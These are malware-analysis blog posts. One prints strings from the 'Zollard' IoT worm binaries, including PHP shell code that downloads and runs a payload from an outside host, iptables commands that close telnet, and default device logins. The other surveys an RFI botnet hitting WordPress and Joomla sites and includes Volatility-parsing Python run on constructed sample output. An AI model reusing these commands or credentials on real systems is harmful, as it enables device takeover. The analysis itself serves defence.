/dav/b3.mips<br />
/dav/b3.rtl<br />
/dav/idhash<br />
/dav/readme<br />
/var/b<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m > <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.text<br />
.rodata<br />
.data<br />
.bss<br />
.comment</div>
</td> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
<br />
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/var/tmp/ep2.mips<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mips<br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m > <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.reginfo<br />
.text<br />
.rodata<br />
.data.rel.ro<br />
.data<br />
.got<br />
.sbss<br />
.bss<br />
.comment<br />
.mdebug.abi32<br />
.pdr</div>
</td> </tr>
<tr> <td><div style="text-align: center;">
Strings from 'arm' file</div>
</td> <td><div style="text-align: center;">
Strings from 'mips' file</div>
</td></tr>
</tbody></table>
<div style="text-align: left;">
<br /></div>
<table border="1" style="text-align: left;"><tbody>
<tr> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
ep2.mips<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/var/tmp/ep2.mips<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m <br />
GYvh<br />
QdV[3<br />
y8G9<br />
lQ\a&lt; &lt;zh<br />
echo -ne<br />
rm -rf<br />
0123456789abcdef<br />
1234<br />
12345<br />
dreambox<br />
smcadmin<br />
&gt; <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.reginfo<br />
.text<br />
.rodata<br />
.data.rel.ro<br />
.data<br />
.got<br />
.sbss<br />
.bss<br />
.comment<br />
.mdebug.abi32<br />
.pdr<br />
</div>
</td> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
ep2.ppc<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/var/run/z<br />
reboot<br />
#!/bin/sh<br />
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot<br />
killall arm ppc mips mipsel<br />
sleep 10<br />
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot<br />
GET / HTTP/1.1<br />
Host: <br />
mips<br />
mipsel<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m<br />
GYvh<br />
QdV[3<br />
y8G9<br />
lQ\a&lt; &lt;zh<br />
echo -ne<br />
rm -rf<br />
0123456789abcdef<br />
1234<br />
12345<br />
dreambox<br />
smcadmin<br />
&gt; <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
admin<br />
root<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.text<br />
.rodata<br />
.data<br />
.sbss<br />
.bss<br />
.comment<br />
</div>
</td> </tr>
<tr> <td><div style="text-align: center;">
Strings from 'mipsel' file</div>
</td> <td><div style="text-align: center;">
Strings from 'ppc' file</div>
</td></tr>
</tbody></table>
<table border="1" style="text-align: left;"><tbody>
<tr> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 800px;">
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
nodes<br />
/bin/sh<br />
GET / HTTP/1.1<br />
Host: <br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/usr/bin/wget<br />
/usr/bin/-wget<br />
/cgi-bin/php<br />
/cgi-bin/php5<br />
/cgi-bin/php-cgi<br />
/cgi-bin/php.cgi<br />
/cgi-bin/php4<br />
EHW:<br />
p"XW<br />
m > <br />
echo -n > <br />
&& echo -e \\x5A<br />
mkdir -p <br />
/var/run/.zollard/<br />
chmod +x <br />
cp /bin/sh <br />
root<br />
1234<br />
12345<br />
dreambox<br />
smcadmin<br />
0!0 <br />
SHA1<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
GCC: (GNU) 4.1.2<br />
.shstrtab<br />
.text<br />
.rodata<br />
.data<br />
.bss<br />
.comment</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: center;">
Strings from 'x86' file<br />
<br />
<div style="text-align: left;">
So who is "Zollard"? What is the relationship between the scanned targets and the original scanner?</div>
<div style="text-align: left;">
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts. At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
We recommend blocking the IP address 78.39.232.113 and ensuring that all Internet-facing devices (yes, "devices") are strongly secured. </div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
Andre M. DiMino (http://www.blogger.com/profile/07255414624107506662)<br />
<br />
Under this rock... Vulnerable Wordpress/Joomla sites...<br />
Published 2013-05-31T23:55:00.000-04:00 (updated 2014-06-04T00:09:24.175-04:00)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: center;">
Overview of the RFI botnet malware arsenal</h2>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; margin: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi__wwrG9QpqQAjyxn1-juq6TiHnYggIxbAxtqbyvWqA_a7y-Xc5uQtJTxIJG46_VMx1zo1SWEWl3_uFsILBAa0mm7eOK8OP0jaYIykhdyQNbFre_B9FAdEY7Pyure2DRPO4BYFcG6Yza-/s1600/new-england-aquarium-reef-bottom.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi__wwrG9QpqQAjyxn1-juq6TiHnYggIxbAxtqbyvWqA_a7y-Xc5uQtJTxIJG46_VMx1zo1SWEWl3_uFsILBAa0mm7eOK8OP0jaYIykhdyQNbFre_B9FAdEY7Pyure2DRPO4BYFcG6Yza-/s200/new-england-aquarium-reef-bottom.jpg" height="150" width="200" /></a></span></div>
<span style="font-family: inherit;"><span style="font-family: inherit;">Exploits directed at WordPress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are performed by automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.</span></span><br />
<br />
<span style="font-family: inherit;">One such infection scheme is essentially the following:</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">A downloader trojan (Mutopy - Win32) (</span><span style="line-height: 19.984375px;"><a href="https://www.virustotal.com/en/file/20a6ebf61243b760dd65f897236b6ad3/analysis/">20a6ebf61243b760dd65f897236b6ad3 Virustotal</a>)</span><span style="font-family: inherit;"> instructs the infected host to download:</span><br />
<span style="font-family: inherit;">1) Remote File Injector "Symmi" (Win32) </span><a href="https://www.virustotal.com/en/file/012c9b851143df9293b7d1bae1920efb005083df5257e3920d1f524e2c605198/analysis/">7958f73daf4b84e3b00e008258ea2e7a Virustotal<span style="font-family: inherit;"> </span></a><br />
<span style="font-family: inherit;">2) SDbot (Win32) - </span><a href="https://www.virustotal.com/en/file/03cc891a30d06478131e4d7c655a85cd0c2159721838c0adffb5152eb8870a96/analysis/">aaee52bfb589f6534c4b51e3b144dc08 <span style="font-family: inherit;">Virustotal </span></a><br />
<span style="font-family: inherit;">3) <a href="http://www.deependresearch.org/p/file-sm14e.html">PHP scripts for injecting into compromised WordPress sites.</a> Among them is a PHP spambot (victimized site owners are often alerted to the copious amounts of pharmaceutical and porn spam emanating from their sites). This spambot is also the source of the varied spam links: thousands of different URLs that all redirect to the same sites (e.g. weight-loss, work-at-home scams, or porn sites).</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The "hackers" attacking the WordPress servers are armies of compromised Windows desktops continuously checking the C&C servers for new targets. This is why sites that are cleaned but not fully patched and secured get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server; it's much harder to discover how the server was compromised in the first place.</span><br />
<div>
<span style="font-family: inherit;"><br /></span></div>
</div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><span style="line-height: 19.984375px;">This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track. </span><span style="line-height: 19.984375px;">In this post, we take a quick look at one such attack infrastructure. Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack. At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites. <u>With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.</u></span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: inherit; line-height: 1.428571em;">Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.</span></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCOdoAH2EUBDjGSf6iWe-ueS8jvjBY3hqa709Q7001uLzzqh-_a_RW6f6Ij2gUW3GrqW9dyO_qK8o58W-4Vt5iuw8XD1LJiLL4B2xKHcIZ-4wD0YwDImEcIR_mYjM-q0pr32LlhoKETVs/s1600/netscan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCOdoAH2EUBDjGSf6iWe-ueS8jvjBY3hqa709Q7001uLzzqh-_a_RW6f6Ij2gUW3GrqW9dyO_qK8o58W-4Vt5iuw8XD1LJiLL4B2xKHcIZ-4wD0YwDImEcIR_mYjM-q0pr32LlhoKETVs/s640/netscan.png" height="314" width="640" /></span></a></div>
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: inherit; line-height: 1.428571em;">Note that all but two outbound connections were created by </span><i style="font-family: inherit; line-height: 1.428571em;">conhost.exe</i><span style="font-family: inherit; line-height: 1.428571em;"> (PID 3060), while </span><i style="font-family: inherit; line-height: 1.428571em;">mqtgsvc.exe</i><span style="font-family: inherit; line-height: 1.428571em;"> (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="line-height: 1.428571em;">
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; line-height: 1.428571em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5NqY51VobHUyQiFac3C-Yq8eaa4hFlBIffij6PUiDZ0Icl5YSLOuo24E7uDHmzWcTO_djRd1F_4e0vgc9DS2P3fEBmqOdlJflwRKeaQseKY9fLtDusGy39zHdG27lv69jvc4pzB44tKY/s1600/pslist.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5NqY51VobHUyQiFac3C-Yq8eaa4hFlBIffij6PUiDZ0Icl5YSLOuo24E7uDHmzWcTO_djRd1F_4e0vgc9DS2P3fEBmqOdlJflwRKeaQseKY9fLtDusGy39zHdG27lv69jvc4pzB44tKY/s640/pslist.png" height="398" width="640" /></span></a></div>
<div style="line-height: 1.428571em;">
<span style="font-family: inherit;"><br /></span></div>
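<span style="font-family: inherit;">As an added example (editor's code, not from the original post), the following Python joins Volatility 2 <i>netscan</i> and <i>pslist</i> text output to show which process owns the port-80 connections and how it was spawned. The two tables it parses are constructed sample output: the PIDs, image names and remote addresses match what this post reports, while the offsets, local addresses, timestamps and the explorer.exe parent (PID 1528) are placeholders.</span><br />

```python
import re
from collections import Counter

# CONSTRUCTED sample output in the shape of Volatility 2.x `pslist` and
# `netscan` tables.  PIDs, image names and remote IP:port pairs are the ones
# reported in the post; offsets, local addresses, timestamps and the
# explorer.exe parent (PID 1528) are invented placeholders.
PSLIST_SAMPLE = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------
0x85a1b030 explorer.exe           1528   1500     20      600      1      0 2013-05-27 03:20:01 UTC+0000
0x85b22d40 mqtgsvc.exe            2968   1528      4       90      1      0 2013-05-27 03:27:05 UTC+0000
0x85b40a10 conhost.exe            3060   2968      9      210      1      0 2013-05-27 03:27:09 UTC+0000
"""

NETSCAN_SAMPLE = """\
Offset(P)  Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x3e1c5008 TCPv4    10.0.2.15:49170                95.163.104.69:80     ESTABLISHED      2968     mqtgsvc.exe
0x3e1d2a10 TCPv4    10.0.2.15:49171                95.163.104.94:80     ESTABLISHED      2968     mqtgsvc.exe
0x3e1e0bb8 TCPv4    10.0.2.15:49172                46.165.230.185:80    ESTABLISHED      3060     conhost.exe
0x3e1e4c20 TCPv4    10.0.2.15:49173                208.115.109.53:80    ESTABLISHED      3060     conhost.exe
0x3e1f1d38 TCPv4    10.0.2.15:49174                85.143.166.221:80    ESTABLISHED      3060     conhost.exe
0x3e1f9e50 UDPv4    0.0.0.0:5355                   *:*                                   2968     mqtgsvc.exe
"""

PSLIST_RE = re.compile(r"^0x[0-9a-fA-F]+\s+(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)")
# UDP rows in netscan have an empty State column, hence the optional group.
NETSCAN_RE = re.compile(
    r"^0x[0-9a-fA-F]+\s+(?P<proto>TCPv[46]|UDPv[46])\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s+(?P<owner>\S+)"
)


def parse_pslist(text):
    """Map PID -> (image name, PPID)."""
    procs = {}
    for line in text.splitlines():
        m = PSLIST_RE.match(line)
        if m:
            procs[int(m["pid"])] = (m["name"], int(m["ppid"]))
    return procs


def parse_netscan(text):
    """List of connection dicts (proto, local, remote, state, pid, owner)."""
    conns = []
    for line in text.splitlines():
        m = NETSCAN_RE.match(line)
        if m:
            d = m.groupdict()
            d["pid"] = int(d["pid"])
            d["state"] = d["state"] or ""
            conns.append(d)
    return conns


def ancestry(pid, procs):
    """Walk PPID links upward, e.g. ['conhost.exe(3060)', 'mqtgsvc.exe(2968)', ...]."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(f"{procs[pid][0]}({pid})")
        pid = procs[pid][1]
    return chain


def outbound_report(conns, procs, remote_port=80):
    """Per-PID count of TCP connections to remote_port, busiest first, with
    the process ancestry attached."""
    counts = Counter(
        c["pid"] for c in conns
        if c["proto"].startswith("TCP") and c["remote"].endswith(f":{remote_port}")
    )
    report = []
    for pid, n in counts.most_common():
        name, ppid = procs.get(pid, ("(not in pslist)", None))
        report.append({"pid": pid, "name": name, "ppid": ppid,
                       "connections": n, "chain": ancestry(pid, procs)})
    return report


def parent_child_both_connecting(report):
    """(parent_pid, child_pid) pairs where both processes have outbound
    connections: the mqtgsvc.exe -> conhost.exe pattern from the post."""
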